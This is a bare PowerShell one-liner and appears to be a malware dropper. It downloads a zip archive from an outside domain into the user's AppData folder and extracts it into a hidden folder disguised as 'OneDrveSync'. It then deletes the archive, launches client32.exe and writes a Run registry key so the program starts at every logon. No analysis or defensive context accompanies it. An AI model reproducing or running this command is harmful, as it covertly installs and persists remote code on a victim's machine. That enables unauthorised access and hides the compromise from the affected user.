cd $env:AppData; $link="https://gold-fish.top/glazgo.zip"; $path=$env:APPDATA+"\dn.zip"; $pzip=$env:APPDATA+"\OneDrveSync"; Start-BitsTransfer -Source $link -Destination $Path; expand-archive -path .\dn.zip -destinationpath $pzip; $FOLD=Get-Item $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -path $path; cd $pzip; start client32.exe; $fstr=$pzip+"\client32.exe"; New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrveSync" -Value $fstr -PropertyType "String";